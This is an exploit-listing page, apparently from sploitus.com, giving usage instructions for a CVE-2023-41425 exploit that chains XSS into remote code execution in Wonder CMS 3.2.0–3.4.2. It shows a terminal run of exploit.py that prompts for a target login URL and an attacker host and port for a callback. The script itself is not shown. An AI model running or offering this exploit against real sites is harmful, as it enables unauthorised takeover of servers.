Share
## https://sploitus.com/exploit?id=2A92931E-FB4A-5D32-9867-3A869B8C1A92
# CVE-2023-41425
CVE-2023-41425 (XSS to RCE, Wonder CMS 3.2.0 <= 3.4.2)

### Usage

```bash
โžœ  CVE-2023-41425 python3 exploit.py
Enter target URL (RHOST, e.g., http://example.com/loginURL): http://redacted.com/loginURL
Enter your local host IP (LHOST, e.g., 10.10.14.xxx): xx.xx.xx.xx
Enter your local web server port (LPORTWEB, e.g., 80): 80

```

![POC](POC/1.png)

![POC](POC/2.png)